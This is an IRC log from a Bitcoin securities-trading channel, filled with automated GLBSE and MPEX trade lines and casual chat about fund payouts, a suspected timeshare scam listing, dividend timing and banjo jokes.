Aug 18 17:47:20 I do not trust that shit bird Obsi at all Aug 18 17:47:22 [GLBSE] [YARR] 20 @ 1 = 20 BTC [+] Aug 18 17:47:37 obsi didnt fuck up 1mhs like you think Aug 18 17:47:40 but who cares. If he pays, then no problems Aug 18 17:47:50 he sold them at IPO price, he bought them back at IPO price and then reissued at a much lower price Aug 18 17:47:51 [GLBSE] [PUREMINING] 1 @ 0.138 BTC [-] Aug 18 17:48:04 [GLBSE] [FPGAMINING] 1 @ 0.8799 BTC [+] Aug 18 17:48:05 and hes also buying them back at that new price later Aug 18 17:48:14 [MPEX] [F.GIGA.ETF] 7917 @ 0.00102785 = 8.1375 BTC [-] Aug 18 17:48:16 [MPEX] [F.GIGA.ETF] 4472 @ 0.00100813 = 4.5084 BTC [-] Aug 18 17:48:17 [MPEX] [F.GIGA.ETF] 16364 @ 0.00100311 = 16.4149 BTC [-] Aug 18 17:48:18 [MPEX] [F.GIGA.ETF] 50000 @ 0.001 = 50 BTC [-] Aug 18 17:48:21 hes actually giving a shit about investors Aug 18 17:48:37 [GLBSE] [BITBOND] 1 @ 0.3997 BTC [+] Aug 18 17:49:02 [GLBSE] [YARR] 25 @ 1 = 25 BTC [+] Aug 18 17:49:03 [GLBSE] [YARR] 4 @ 1 = 4 BTC [+] Aug 18 17:49:05 [GLBSE] [YARR] 36 @ 1 = 36 BTC [+] Aug 18 17:49:51 [GLBSE] [FPGAMINING] 1 @ 0.8799 BTC [+] Aug 18 17:50:05 [GLBSE] [BIB.BVPS] 1 @ 0.0022 BTC [-] Aug 18 17:53:21 [GLBSE] [RAREEARTH] 1 @ 0.00983999 BTC [-] Aug 18 17:57:23 [GLBSE] [GIGAMINING] 4 @ 0.9999 = 3.9996 BTC [+] Aug 18 17:57:24 [GLBSE] [GIGAMINING] 1 @ 1 BTC [+] Aug 18 18:00:33 [GLBSE] [BDT] 5 @ 0.9 = 4.5 BTC [-] Aug 18 18:00:34 [GLBSE] [BDT] 55 @ 0.9 = 49.5 BTC [-] Aug 18 18:02:13 [GLBSE] [YARR] 17 @ 1 = 17 BTC [+] Aug 18 18:02:25 EskimoBob: see thread Aug 18 18:02:41 mircea_popescu: you as well Aug 18 18:04:24 Im going to bed, but this should put everyone on the same page now Aug 18 18:04:30 Diablo-D3: reading Aug 18 18:05:26 [GLBSE] [GIGAMINING] 5 @ 1 = 5 BTC [+] Aug 18 18:06:49 ;;bc,stats Aug 18 18:06:51 Current Blocks: 194485 | Current Difficulty: 2190865.9701029 | Next Difficulty At Block: 195551 | Next Difficulty In: 1066 blocks | Next Difficulty In About: 6 days, 21 hours, 13 minutes, and 48 seconds | Next Difficulty Estimate: 2358358.10867159 | Estimated Percent Change: 7.64501986221 Aug 18 18:07:59 Diablo-D3 ? Aug 18 18:10:38 Wow. Aug 18 18:11:15 I can't believe Nefario let TIMESHAREAFRICA list. They're not a member of VOASA and are not licensed to do what they're doing. It's an obvious scam. Aug 18 18:11:31 They are not connected with DINOKENG big5 game reserve either, I looked them up. Aug 18 18:11:42 what is that thing? Aug 18 18:12:00 usagi ouch. Aug 18 18:12:06 what're they doing Aug 18 18:12:19 [GLBSE] [GMVT-BOT] 2 @ 0.1 = 0.2 BTC [+] Aug 18 18:12:22 I posted this in the forums too, and it was confirmed..... Aug 18 18:12:51 They're trying to resell timeshare condos in south africa and insinuating that they have land on dinokeng big5 game reserve Aug 18 18:13:06 They're not ID verified Aug 18 18:13:23 In order to do that you need to be licensed by the south african government, and they're not, I got an email back saying that Aug 18 18:14:07 Then there is the idea of why they are raising capital for this in the first place. They said they're renting out Aug 18 18:14:15 They are probably using the raised money to pay maintencnace fees Aug 18 18:14:20 Black hole alert..... Aug 18 18:14:24 [MPEX] [S.MPOE] 21500 @ 0.00038203 = 8.2136 BTC [+] Aug 18 18:14:26 [MPEX] [S.MPOE] 11377 @ 0.00038293 = 4.3566 BTC [+] Aug 18 18:14:56 Nefario if you're reading this, allowing them to list after I posted that thread was a big mistake. Aug 18 18:15:17 I sent them an email as well with a list of questions Aug 18 18:15:29 They replied back and just said to read their contract online and that all the information was there Aug 18 18:16:55 I asked them for their business information, and who the directors were, if they wer elicensed, and if they were members of VOASA Aug 18 18:17:56 they just ducked the questions and said: Aug 18 18:18:00 Hi Serna, Aug 18 18:18:02 Please have a look at the following link: Aug 18 18:18:03 http://www.mahalaview.co.za/page6.html Aug 18 18:18:03 *Habitat/birding*. Aug 18 18:18:03 "All of the land in the conservancy is privately owned and much is Aug 18 18:18:03 uninhabited." Aug 18 18:18:23 Our summary can be found on the GLBSE website. Aug 18 18:18:23 On our website http://www.timeshareafrica.co.za/ Aug 18 18:18:23 we offer Members of VOASA to advertise on our website. Aug 18 18:18:23 Thank you for bringing this to my attention Aug 18 18:18:23 Pieter Aug 18 18:18:28 That's it Aug 18 18:18:51 No business info, no license, no telephone number, confirmed not members of voasa Aug 18 18:19:02 aha Aug 18 18:19:15 good call Aug 18 18:23:45 [GLBSE] [NYAN.B] 3 @ 1.02 = 3.06 BTC [+] Aug 18 18:26:31 And they sponsor a business where they kill animals...... Aug 18 18:26:58 [GLBSE] [NYAN] 1 @ 1 BTC [+] Aug 18 18:30:07 what is timeshre? Aug 18 18:30:13 timeshare* Aug 18 18:32:35 it usually means you get to use the cabin or holiday home for an amount of time Aug 18 18:32:40 sharing it with others for the same Aug 18 18:33:20 ahh' Aug 18 18:35:01 timeshare is one of the largest internet scams. Aug 18 18:35:43 it has landed at bitcoin economy!! bitcoin CANT CRASH!! Aug 18 18:36:41 [GLBSE] [FUTUREFUND] 2075 @ 0.00008011 = 0.1662 BTC [-] Aug 18 18:37:07 [GLBSE] [FPGAMINING] 5 @ 0.88 = 4.4 BTC [+] Aug 18 18:38:50 [GLBSE] [PUREMINING] 5 @ 0.138 = 0.69 BTC [-] Aug 18 18:41:42 [GLBSE] [FPGAMINING] 5 @ 0.88 = 4.4 BTC [+] Aug 18 18:41:44 [GLBSE] [FOO.PPPPT] 1 @ 0.8 BTC [+] Aug 18 18:41:47 offshore real estate scams are huge right now in south america Aug 18 18:42:10 [GLBSE] [FOO.PPPPT] 2 @ 0.52009009 = 1.0402 BTC [-] Aug 18 18:43:01 has pirate made any other announcements or comments after the announcement yesterday? Aug 18 18:44:58 [GLBSE] [FOO.PPPPT] 3 @ 0.5001001 = 1.5003 BTC [-] Aug 18 18:45:51 He answered some questions in otc last night Aug 18 18:46:15 [GLBSE] [PUREMINING] 2 @ 0.139 = 0.278 BTC [+] Aug 18 18:46:57 usagi: I assume YARR is going to pay out 1BTC to holders at some point? Aug 18 18:48:00 Yes Aug 18 18:48:05 First we will try to bid wall it Aug 18 18:48:26 If pirate does not pay back the coins that will be a 30 day process Aug 18 18:48:58 Otherwise it will be wrapped up by the end of the week Aug 18 18:49:01 Sure Aug 18 18:49:10 [GLBSE] [OBSI.HRPT] 39 @ 0.1 = 3.9 BTC [-] Aug 18 18:49:12 [GLBSE] [MMM] 2 @ 0.75 = 1.5 BTC [-] Aug 18 18:49:35 [GLBSE] [OBSI.HRPT] 2 @ 0.093 = 0.186 BTC [-] Aug 18 18:49:52 [11:07:55] Diablo-D3 ? Aug 18 18:50:04 [GLBSE] [OBSI.HRPT] 9 @ 0.09201 = 0.8281 BTC [-] Aug 18 18:50:17 mircea_popescu: you were interested in DMC Aug 18 18:51:47 [GLBSE] [UDN] 20 @ 0.0895 = 1.79 BTC [+] Aug 18 18:52:02 When they made bit daytrade and zipconf and rebate they raised 10,000 bitcoins Aug 18 18:52:07 that was very suprising to me Aug 18 18:52:25 I'm working on a competitor to zipconf and associated technologies now, but no one will give me any money Aug 18 18:52:34 no one is excited or wants to buy in. bad timing I guess Aug 18 18:52:48 Well after that debacle can you blame them? Aug 18 18:52:57 [GLBSE] [PUREMINING] 40 @ 0.139 = 5.56 BTC [+] Aug 18 18:53:52 [GLBSE] [MMM] 4 @ 0.5 = 2 BTC [-] Aug 18 18:55:45 [GLBSE] [NYAN.B] 5 @ 1.02 = 5.1 BTC [+] Aug 18 18:56:19 [MPEX] [S.MPOE] 13996 @ 0.00038112 = 5.3342 BTC [-] Aug 18 18:57:38 [GLBSE] [NASTY] 50 @ 0.7 = 35 BTC [+] Aug 18 18:57:57 [GLBSE] [ASICMINER] 15 @ 0.1001 = 1.5015 BTC [-] Aug 18 18:57:59 [GLBSE] [ASICMINER] 13 @ 0.1 = 1.3 BTC [-] Aug 18 18:58:13 [GLBSE] [NASTY] 25 @ 0.7 = 17.5 BTC [+] Aug 18 18:58:40 [GLBSE] [NASTY] 4 @ 0.7 = 2.8 BTC [+] Aug 18 18:59:35 [GLBSE] [NASTY] 2 @ 0.7 = 1.4 BTC [+] Aug 18 19:00:28 [MPEX] [O.BTCUSD.C130T] 8 @ 0.10268598 = 0.8215 BTC [-] Aug 18 19:00:29 [MPEX] [O.BTCUSD.C120T] 7 @ 0.14795465 = 1.0357 BTC [-] Aug 18 19:05:59 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7699 BTC [+] Aug 18 19:06:00 [GLBSE] [TYGRR.BOND-P] 4 @ 0.76999 = 3.08 BTC [+] Aug 18 19:06:02 [GLBSE] [TYGRR.BOND-P] 1 @ 0.77 BTC [+] Aug 18 19:06:15 [GLBSE] [TYGRR.BOND-P] 1 @ 0.77 BTC [+] Aug 18 19:17:45 [MPEX] [S.MPOE] 15423 @ 0.00038293 = 5.9059 BTC [+] Aug 18 19:24:46 [GLBSE] [ASICMINER] 36 @ 0.1 = 3.6 BTC [-] Aug 18 19:24:47 [GLBSE] [ASICMINER] 1 @ 0.1049 BTC [+] Aug 18 19:24:48 [GLBSE] [ASICMINER] 15 @ 0.10499 = 1.5749 BTC [+] Aug 18 19:24:49 [GLBSE] [ASICMINER] 48 @ 0.105 = 5.04 BTC [+] Aug 18 19:26:26 [MPEX] [F.GIGA.ETF] 10573 @ 0.00099074 = 10.4751 BTC [-] Aug 18 19:29:03 [GLBSE] [NYAN.B] 1 @ 1.02 BTC [+] Aug 18 19:29:24 [GLBSE] [TYGRR.BOND-P] 8 @ 0.77 = 6.16 BTC [+] Aug 18 19:29:33 [GLBSE] [NYAN.C] 5 @ 1 = 5 BTC [+] Aug 18 19:56:48 [GLBSE] [LTC-MINING] 4 @ 0.6 = 2.4 BTC [+] Aug 18 19:57:14 [GLBSE] [PPT.B] 10 @ 1.1299 = 11.299 BTC [+] Aug 18 19:57:15 [GLBSE] [PPT.B] 7 @ 1.13 = 7.91 BTC [+] Aug 18 20:00:25 [MPEX] [O.BTCUSD.C130T] 8 @ 0.0968406 = 0.7747 BTC [-] Aug 18 20:00:27 [MPEX] [O.BTCUSD.C100T] 2 @ 0.26931859 = 0.5386 BTC [-] Aug 18 20:02:58 night all Aug 18 20:04:18 [GLBSE] [NASTY] 5 @ 0.5511 = 2.7555 BTC [-] Aug 18 20:04:19 [GLBSE] [NASTY] 4 @ 0.551 = 2.204 BTC [-] Aug 18 20:04:20 [GLBSE] [NASTY] 10 @ 0.55 = 5.5 BTC [-] Aug 18 20:06:10 [GLBSE] [CBGB] 2 @ 0.5 = 1 BTC [+] Aug 18 20:08:08 [GLBSE] [TYGRR.BOND-P] 26 @ 0.77 = 20.02 BTC [+] Aug 18 20:10:27 [GLBSE] [FOO.PPPPT] 4 @ 0.7989 = 3.1956 BTC [+] Aug 18 20:10:29 [GLBSE] [FOO.PPPPT] 2 @ 0.799 = 1.598 BTC [+] Aug 18 20:12:09 [MPEX] [S.MPOE] 12300 @ 0.00038315 = 4.7127 BTC [+] Aug 18 20:14:47 that was very suprising to me << maybe it was just among a circle of people. Aug 18 20:22:24 [GLBSE] [TEEK.B] 1 @ 0.99 BTC [-] Aug 18 20:37:11 [GLBSE] [BDT] 3 @ 0.9001 = 2.7003 BTC [+] Aug 18 20:37:38 [GLBSE] [BDT] 24 @ 0.9 = 21.6 BTC [-] Aug 18 20:38:20 [GLBSE] [BDT] 5 @ 0.861 = 4.305 BTC [-] Aug 18 20:38:21 [GLBSE] [BDT] 29 @ 0.85 = 24.65 BTC [-] Aug 18 20:38:23 [GLBSE] [BDT] 5 @ 0.811 = 4.055 BTC [-] Aug 18 20:38:24 [GLBSE] [BDT] 2 @ 0.81 = 1.62 BTC [-] Aug 18 20:38:24 [GLBSE] [BDT] 29 @ 0.8 = 23.2 BTC [-] Aug 18 20:42:36 mircea_popescu: i think your bot's bids/asks arn't showing up in the json again Aug 18 20:45:26 oh wait Aug 18 20:45:32 they are just unordered Aug 18 20:51:45 [MPEX] [S.MPOE] 45993 @ 0.00038373 = 17.6489 BTC [+] Aug 18 20:54:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6501 BTC [-] Aug 18 20:57:09 [GLBSE] [OBSI.HRPT] 4 @ 0.1005 = 0.402 BTC [+] Aug 18 20:58:06 [GLBSE] [OBSI.HRPT] 1 @ 0.1024 BTC [+] Aug 18 21:01:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [+] Aug 18 21:02:23 [GLBSE] [OBSI.HRPT] 243 @ 0.10287 = 24.9974 BTC [+] Aug 18 21:03:47 smickles again ? did it happen before ? Aug 18 21:07:25 [MPEX] [S.MPOE] 9407 @ 0.00038373 = 3.6097 BTC [+] Aug 18 21:07:26 [MPEX] [S.MPOE] 14080 @ 0.00038537 = 5.426 BTC [+] Aug 18 21:08:59 [GLBSE] [JTME] 3 @ 0.988 = 2.964 BTC [-] Aug 18 21:10:32 [GLBSE] [FPGAMINING] 2 @ 0.8799 = 1.7598 BTC [-] Aug 18 21:10:57 mircea_popescu: it was a while ago, possibly b/c i called on it at just the right second Aug 18 21:11:08 also Aug 18 21:11:09 a Aug 18 21:11:46 remembr how you asked for anythng conceivable to include in the vwap json? Aug 18 21:11:59 what about the last price traded? Aug 18 21:12:11 isnt that in there ? Aug 18 21:12:27 a yea it's not. Aug 18 21:13:00 thing is the stats stream and the trades stream are two different streams Aug 18 21:13:07 and what do you think of a '24hr change'? Aug 18 21:13:08 theoretically you should have it already. Aug 18 21:13:19 what's a 24h change ? Aug 18 21:13:19 oh Aug 18 21:13:33 [GLBSE] [FPGAMINING] 1 @ 0.8799 BTC [-] Aug 18 21:13:34 i haven't messed with the trades stream Aug 18 21:14:13 well, i would say change since open, but the market doesn't close Aug 18 21:14:29 yeah. Aug 18 21:15:02 [GLBSE] [YABMC] 2 @ 0.1249 = 0.2498 BTC [+] Aug 18 21:15:16 so, if i want the last and the change, i'll start monitoring the trade stream and keep a db Aug 18 21:15:26 yeah. Aug 18 21:15:40 that'll have to come after MVP Aug 18 21:15:49 (minimum viable product) Aug 18 21:15:52 mvp ? a yea. Aug 18 21:18:51 [MPEX] [S.MPOE] 20 @ 0.00038537 = 0.0077 BTC [+] Aug 18 21:18:52 [MPEX] [S.MPOE] 18308 @ 0.00039058 = 7.1507 BTC [+] Aug 18 21:22:38 [MPEX] [F.GIGA.ETF] 4927 @ 0.00099074 = 4.8814 BTC [-] Aug 18 21:22:40 [MPEX] [F.GIGA.ETF] 10900 @ 0.00098625 = 10.7501 BTC [-] Aug 18 21:24:28 GLBSE for fuck sake! MOVE! How slow can this page loading get? Aug 18 21:25:16 nefario: please comment out all the charts :) easy thing to do as a temp fix. Aug 18 21:26:11 usagi: did you sell all NYAN.B? Aug 18 21:26:15 actually that's not such a bad idea. Aug 18 21:27:11 [MPEX] [F.GIGA.ETF] 137 @ 0.00098079 = 0.1344 BTC [-] Aug 18 21:27:13 [MPEX] [F.GIGA.ETF] 11247 @ 0.001 = 11.247 BTC [+] Aug 18 21:27:26 EskimoBob: Hi! Aug 18 21:27:46 EskimoBob: I canceled sales of NYAN.B for now, to prevent dillution. Aug 18 21:27:48 those are particularly useless on the front page Aug 18 21:28:01 usagi: what about A? Aug 18 21:28:05 It's not fair to people who bought in at 1 that you would be allowed to buy in at 1 now and get a 2% div tomorrow. Aug 18 21:28:10 Canceled Aug 18 21:28:20 I think you can still buy NYAN, but I should cancel it too Aug 18 21:28:21 what do you mean cancelled ?! Aug 18 21:28:34 Canceled sales Aug 18 21:28:37 o o Aug 18 21:28:41 until monday Aug 18 21:28:51 We don't want people buying in the day before divs and getting 2% interest in 1 day Aug 18 21:28:53 not sure what this means Aug 18 21:29:07 ya me either. Aug 18 21:29:13 do you mean you aren't sellign them anymore ? Aug 18 21:29:18 Why should we allow investors to buy in on saturday, get an immediate 2% payment, then sell out? doesn't make sense Aug 18 21:29:23 That's right Aug 18 21:29:33 Sales have been canceled until we pay divs on monday or tuesday. Aug 18 21:29:35 i see. Aug 18 21:29:43 EskimoBob make me an offer on a 100 nyan.a package :D Aug 18 21:29:52 mircea_popescu: 1 :) Aug 18 21:30:06 cute. Aug 18 21:30:09 nyan A is worth 1 Aug 18 21:30:12 it's solid as a rock Aug 18 21:30:51 you guys force me to listen 181.fm front porch bluegrass Aug 18 21:31:12 EskimoBob how many shares of NYAN.A do you own? Aug 18 21:31:22 mircea_popescu: I'll give you small premium? Aug 18 21:31:45 I want to buy some I got some zeros money back and now it just sits there Aug 18 21:32:22 I'll put up NYAN.A for 1.01 then Aug 18 21:32:25 That's fair :) Aug 18 21:32:56 plinn plinn ... I Know Rain ... squeek squeek squueeek Aug 18 21:33:06 OK Aug 18 21:34:14 [GLBSE] [NYAN.A] 40 @ 1.01 = 40.4 BTC [+] Aug 18 21:35:20 fuck, I am going to by me self a banjo and probably get shot 2 days after it arrives Aug 18 21:35:38 Yeah I'd shoot anyone I heard playing a banjo Aug 18 21:36:00 Nicholas Cage is a good actor. Aug 18 21:36:21 really cool instrument actually (yes, most music plaid with it is crap) but as a instrument, it interesting Aug 18 21:37:11 Nicholas Cage? Di your mama smoke crack? Cage sucks so bad... there is now word for this sound Aug 18 21:37:44 Here's a nice banjo song: http://www.youtube.com/watch?v=uJg-ZmHV4E0 Aug 18 21:37:50 omg! I need to rise 100+ BTC to buy a banjo :( Aug 18 21:38:31 time to issue a security. Hopefully perpetual and never pays divs. Aug 18 21:38:49 If you issue a banjo fund I will send assassins to kill you Aug 18 21:39:27 are you censoring the guy's right to issuance ? Aug 18 21:39:42 No, he can issue if he wants to Aug 18 21:39:50 You see, you can do it for much less. Send me money for a banjo and my neighbours will take care of this for free... or my wife Aug 18 21:40:10 I can play the recorder very well. Aug 18 21:40:20 I like to figure out show tunes in public. Aug 18 21:40:23 umm.. what is recorder? Aug 18 21:40:59 ;;ticker Aug 18 21:40:59 Best bid: 11.50401, Best ask: 11.50402, Bid-ask spread: 0.00001, Last trade: 11.50401, 24 hour volume: 209796, 24 hour low: 10.6, 24 hour high: 15.1737 Aug 18 21:41:16 oh, flute. cool Aug 18 21:41:20 www.youtube.com/watch?v=yW70AnXI3iM Aug 18 21:41:59 this is way better: http://www.youtube.com/watch?v=a6Oy8FaBirQ Aug 18 21:42:13 usagi : you should prolly have set days. if you pay div sun, only put shares at 1 on monday Aug 18 21:42:21 I'll get the Hurdy Gurdy :) Aug 18 21:43:17 [GLBSE] [TYGRR.BOND-P] 8 @ 0.789 = 6.312 BTC [-] Aug 18 21:43:18 [MPEX] [F.GIGA.ETF] 9562 @ 0.00100423 = 9.6024 BTC [+] Aug 18 21:43:19 [MPEX] [F.GIGA.ETF] 5938 @ 0.00100515 = 5.9686 BTC [+] Aug 18 21:43:20 dude, stop using "prolly" Aug 18 21:44:20 the recorder is a wonderful instrument; http://www.youtube.com/watch?v=UbfhZ3ua_yY Aug 18 21:45:48 usagi: my brother knows how to play it. Aug 18 21:48:00 So few people can sing it well, you know Aug 18 21:48:05 www.youtube.com/watch?v=gXHdDJoLLJ8 this guy has the right idea Aug 18 21:48:29 most of the ladies are in the wrong key, and reveal their self-important feelings Aug 18 21:51:07 so i was mowing my lawn, when suddenly http://polimedia.us/dtng/c/src/134531584652.jpg Aug 18 21:51:41 not much of a lawn, is it? Aug 18 21:52:05 what kind of plants are those? Aug 18 21:52:18 i dont even know/ some weed. Aug 18 21:54:30 [MPEX] [S.MPOE] 38962 @ 0.00039058 = 15.2178 BTC [+] Aug 18 22:01:05 [MPEX] [O.BTCUSD.C090T] 2 @ 0.33507056 = 0.6701 BTC [+] Aug 18 22:01:06 [MPEX] [O.BTCUSD.C130N] 4 @ 0.22856971 = 0.9143 BTC [-] Aug 18 22:02:33 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.67145743 = 671.4574 BTC [+] Aug 18 22:02:59 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.58773456 = 587.7346 BTC [+] Aug 18 22:03:20 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.50401169 = 504.0117 BTC [+] Aug 18 22:09:02 i should know not to open those links when the windows are open and children are playing outside my house Aug 18 22:12:57 bah, i've forgotten what the cnt is in mpex-vwap.php Aug 18 22:14:25 [GLBSE] [OBSI.HRPT] 4 @ 0.10287 = 0.4115 BTC [+] Aug 18 22:17:54 smickles transaction count Aug 18 22:18:06 and mebbe you should point your monitor towards a dark and secret corner ? :D Aug 18 22:22:27 [GLBSE] [FUTUREFUND] 2 @ 0.00011715 = 0.0002 BTC [+] Aug 18 22:23:02 [MPEX] [S.MPOE] 37477 @ 0.00038315 = 14.3593 BTC [-] Aug 18 22:23:03 [MPEX] [S.MPOE] 11608 @ 0.00038112 = 4.424 BTC [-] Aug 18 22:23:05 [MPEX] [S.MPOE] 2965 @ 0.0003803 = 1.1276 BTC [-] Aug 18 22:23:59 haha this is retarded. Aug 18 22:24:07 twitter just cut out a number of transactions Aug 18 22:24:14 i suppose because they were identical. Aug 18 22:27:52 top Aug 18 22:27:58 fk... Aug 18 22:44:19 sell me some NYNCAT.B thank you Aug 18 22:46:32 Why don't you buy it at 1.02 :p Aug 18 22:47:22 I can not :( Aug 18 22:47:45 why not Aug 18 22:48:09 it is prohibited by The Law I just made up Aug 18 22:48:25 Well this is why I canceled share sales Aug 18 22:48:47 People will just buy in on friday and saturday hoping to make 1-2% per day and then sell on monday Aug 18 22:48:56 People were selling out NYAN.C at .99 and .98 last week because of that Aug 18 22:49:14 It makes my fund look bad. Aug 18 22:49:43 The problem is you see that people who are looking for a deal aren't looking to hold the shares long term they just want to flip em Aug 18 22:49:45 And that means the market has to burn through those shares before I can sell more Aug 18 22:49:58 Why would I give money away like that? Doesn't make sense Aug 18 22:50:31 no, I am in for long term Aug 18 22:50:52 I have no wish to jump in and out. Aug 18 22:51:27 usagi: this is why I like zeros :) Aug 18 22:52:27 no bull shit penny pinchers every damn tuesday or what ever the div day is Aug 18 22:52:33 selling at 1 now is like selling at 0.98 Aug 18 22:54:35 i'll take it at 1.01 :) Aug 18 22:59:00 [GLBSE] [FPGAMINING] 1 @ 0.8799 BTC [-] Aug 18 23:02:23 [GLBSE] [TYGRR.BOND-P] 32 @ 0.75 = 24 BTC [-] Aug 18 23:02:52 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7599 BTC [+] Aug 18 23:04:32 [GLBSE] [TYGRR.BOND-P] 4 @ 0.759999 = 3.04 BTC [+] Aug 18 23:05:10 [GLBSE] [FOO.PPPPT] 2 @ 0.6001 = 1.2002 BTC [-] Aug 18 23:06:13 [GLBSE] [TYGRR.BOND-P] 4 @ 0.66 = 2.64 BTC [-] Aug 18 23:06:15 [GLBSE] [TYGRR.BOND-P] 4 @ 0.65 = 2.6 BTC [-] Aug 18 23:07:35 [MPEX] [F.GIGA.ETF] 7616 @ 0.00100076 = 7.6218 BTC [-] Aug 18 23:07:36 [MPEX] [F.GIGA.ETF] 7600 @ 0.0009705 = 7.3758 BTC [-] Aug 18 23:09:27 [GLBSE] [OBSI.HRPT] 22 @ 0.10287 = 2.2631 BTC [+] Aug 18 23:10:34 [GLBSE] [OBSI.HRPT] 9 @ 0.10288 = 0.9259 BTC [+] Aug 18 23:13:24 [GLBSE] [TYGRR.BOND-P] 39 @ 0.611 = 23.829 BTC [-] Aug 18 23:14:45 [GLBSE] [BIB.PIRATE] 3 @ 0.7601 = 2.2803 BTC [-] Aug 18 23:14:47 [GLBSE] [BIB.PIRATE] 197 @ 0.76 = 149.72 BTC [-] Aug 18 23:18:51 EskimoBob: https://bitcointalk.org/index.php?topic=97178.msg1111170#msg1111170 Aug 18 23:19:03 [GLBSE] [OBSI.HRPT] 83 @ 0.10288 = 8.539 BTC [+] Aug 18 23:20:19 [GLBSE] [BMMO] 10 @ 0.0797 = 0.797 BTC [+] Aug 18 23:20:32 [MPEX] [S.MPOE] 324 @ 0.00039058 = 0.1265 BTC [+] Aug 18 23:20:33 [MPEX] [S.MPOE] 14176 @ 0.00039121 = 5.5458 BTC [+] Aug 18 23:22:18 [GLBSE] [TYGRR.BOND-P] 40 @ 0.73999999 = 29.6 BTC [+] Aug 18 23:22:32 [GLBSE] [RSM] 4 @ 0.2 = 0.8 BTC [-] Aug 18 23:31:21 [GLBSE] [FPGAMINING] 10 @ 0.88 = 8.8 BTC [+] Aug 18 23:34:17 [GLBSE] [PPT.B] 5 @ 1.1001 = 5.5005 BTC [-] Aug 18 23:34:28 [GLBSE] [NYAN.C] 41 @ 0.989 = 40.549 BTC [-] Aug 18 23:34:29 [GLBSE] [NYAN.C] 1 @ 0.99 BTC [+] Aug 18 23:34:58 [GLBSE] [PPT.B] 17 @ 1.1 = 18.7 BTC [-] Aug 18 23:41:13 [GLBSE] [GIGAMINING] 5 @ 1 = 5 BTC [+] Aug 18 23:41:15 [GLBSE] [GIGAMINING] 19 @ 1 = 19 BTC [+] Aug 18 23:45:04 [GLBSE] [PGM] 2 @ 0.1 = 0.2 BTC [+] Aug 18 23:45:41 [GLBSE] [ASICMINER] 1 @ 0.1003 BTC [-] Aug 18 23:46:41 [GLBSE] [MOORE] 2 @ 0.5006 = 1.0012 BTC [+] Aug 18 23:48:27 [MPEX] [S.MPOE] 42354 @ 0.0003824 = 16.1962 BTC [-] Aug 18 23:49:44 [GLBSE] [MMM] 2 @ 0.5 = 1 BTC [-] Aug 18 23:50:18 [GLBSE] [COGNITIVE] 1 @ 0.6795 BTC [-] Aug 18 23:50:36 [GLBSE] [COGNITIVE] 1 @ 0.6796 BTC [+] Aug 18 23:51:05 [GLBSE] [PUREMINING] 2 @ 0.13899999 = 0.278 BTC [-] Aug 18 23:51:19 [GLBSE] [PUREMINING] 1 @ 0.13899999 BTC [-] Aug 18 23:54:39 [GLBSE] [ASICMINER] 1 @ 0.1049 BTC [+] Aug 18 23:54:40 [GLBSE] [ASICMINER] 6 @ 0.105 = 0.63 BTC [+] Aug 18 23:55:02 [GLBSE] [ASICMINER] 1 @ 0.105 BTC [+] Aug 18 23:58:05 [GLBSE] [OBSI.HRPT] 1 @ 0.10288 BTC [+] Aug 18 23:58:32 [GLBSE] [FPGAMINING] 5 @ 0.88 = 4.4 BTC [+] Aug 18 23:58:59 [GLBSE] [MOORE] 3 @ 0.5006 = 1.5018 BTC [+] Aug 18 23:59:31 [GLBSE] [MMM] 3 @ 0.5 = 1.5 BTC [-] Aug 19 00:00:25 [MPEX] [S.MPOE] 13340 @ 0.00039121 = 5.2187 BTC [+] Aug 19 00:04:09 [GLBSE] [MOORE] 3 @ 0.5005 = 1.5015 BTC [-] Aug 19 00:04:48 [MPEX] [S.MPOE] 14183 @ 0.00039346 = 5.5804 BTC [+] Aug 19 00:05:00 < mircea_popescu> twitter just cut out a number of transactions <<< so what's your opinion of app.net? Aug 19 00:05:19 DMC around .04 Aug 19 00:05:27 where is Diablo Aug 19 00:05:33 that is really bad Aug 19 00:07:18 [GLBSE] [MOORE] 6 @ 0.5 = 3 BTC [-] Aug 19 00:08:21 [GLBSE] [MMM] 9 @ 0.5 = 4.5 BTC [-] Aug 19 00:09:53 He knows... Aug 19 00:18:30 [GLBSE] [BIB.PIRATE] 3 @ 0.7601 = 2.2803 BTC [+] Aug 19 00:18:31 [GLBSE] [BIB.PIRATE] 3 @ 0.76 = 2.28 BTC [-] Aug 19 00:18:35 [GLBSE] [OBSI.HRPT] 1 @ 0.10288 BTC [+] Aug 19 00:21:27 [GLBSE] [BDT] 3 @ 0.8001 = 2.4003 BTC [+] Aug 19 00:21:45 [GLBSE] [BDT] 27 @ 0.8 = 21.6 BTC [-] Aug 19 00:22:35 [GLBSE] [GIGAMINING] 11 @ 1 = 11 BTC [+] Aug 19 00:23:09 BTC-Mining: has he stopped his world mining domination rants yet? Aug 19 00:24:23 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 19 00:25:08 I thought he always wanted to create a datacenter, mostly Aug 19 00:34:39 [GLBSE] [COGNITIVE] 1 @ 0.6796 BTC [+] Aug 19 00:35:21 [GLBSE] [GIGAMINING] 5 @ 1.001881 = 5.0094 BTC [+] Aug 19 00:42:21 [GLBSE] [OBSI.HRPT] 57 @ 0.10288 = 5.8642 BTC [+] Aug 19 00:43:12 [MPEX] [F.GIGA.ETF] 111 @ 0.00094798 = 0.1052 BTC [-] Aug 19 00:43:13 JWU42: read DMC post in the forum. It's a bit confusing Aug 19 00:43:14 [MPEX] [F.GIGA.ETF] 16740 @ 0.00095427 = 15.9745 BTC [+] Aug 19 00:43:15 [MPEX] [F.GIGA.ETF] 2649 @ 0.00095759 = 2.5367 BTC [+] Aug 19 00:54:42 [GLBSE] [TYGRR.BOND-P] 4 @ 0.7299 = 2.9196 BTC [-] Aug 19 00:56:04 [GLBSE] [OBSI.HRPT] 18 @ 0.10001 = 1.8002 BTC [-] Aug 19 00:58:19 [MPEX] [F.GIGA.ETF] 1712 @ 0.0009338 = 1.5987 BTC [-] Aug 19 00:58:21 [MPEX] [F.GIGA.ETF] 3088 @ 0.00092816 = 2.8662 BTC [-] Aug 19 01:00:30 [MPEX] [O.BTCUSD.C130N] 1 @ 0.22323722 BTC [-] Aug 19 01:00:31 [MPEX] [O.BTCUSD.C120N] 1 @ 0.25795169 BTC [+] Aug 